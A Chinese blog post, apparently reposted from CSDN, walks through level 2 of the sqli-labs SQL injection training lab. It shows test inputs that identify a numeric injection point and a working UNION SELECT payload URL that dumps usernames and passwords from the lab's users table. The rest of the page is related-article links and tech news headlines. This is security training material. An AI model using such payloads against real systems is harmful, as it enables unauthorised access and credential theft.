sqli-labs系列——第二关 - 代码天地

sqli-labs系列——第二关

其他 2020-06-26 10:08:00 阅读次数: 0

文章目录

判断注入类型
开始注入

判断注入类型

1' and '1'='1	//错误
1 and 1=1		//正常

所以是数字型注入，所以不需要单引号来闭合前边的参数，但是要用-把参数注释掉，让Mysql执行我们后边的exp
在这里插入图片描述

开始注入

这里就不一一去爆了，跟第一关的流程是一样的，直接上exp干了：

http://192.168.1.113:86/Less-2/?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_43573676/article/details/105762052

sqli-labs系列——第二关

sqli-labs练习（第二关）——数字型

sqli-labs系列——第四关

sqli-labs第二题

重闯Sqli-labs关卡第二天(5关)

sqli-labs(二)

sqli-labs系列——第六关（双引号二次查询注入）

sqli-labs系列——第五关（二次查询注入）

sqli-labs系列——第三关

sqli-labs系列——第一关

二次注入——sqli-labs第24关

sqli-labs（7-8关）

sqli-labs（9-10关）

sqli-labs（11-16关）

sqli-labs（23-28a关）

sqli-labs（17-22关）

sqli-labs 1-4关

sqli-labs通关----11~20关

sqli-labs-master 第二,三关

SQLI-LABS系列（持续更新）

sqli-labs系列——第七关（GET字符型注入导出shell）

sql二次注入-sqli-labs第13关

sql双引号二次注入-sqli-labs第6关

sqli-labs实战记录(二)

文件上传之服务端绕过(upload-labs第二关)

sqli-labs靶场7-10关

sqli-labs靶场1-6关

sqli-labs靶场11-16关

sqli-labs靶场29-38关

sqli-labs靶场18-22关

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

BPM为企业带来的实际利益

好程序员web前端分享css常用属性缩写

Java文件下载（excel）

css样式的动态添加及显示和隐藏等零碎用法

axios全局配置以及拦截器

使用Logstash来实时同步MySQL和log日志数据到ES

C++获取当前时间（年月日、时分秒、毫秒）

Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)

Java环境配置正确，但是java、javac、java -version均返回“不是内部或外部命令，也不是可运行的程序或批处理文件”？

01 官网下载各种CentOS教程（超详细版）

每日归档

更多

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)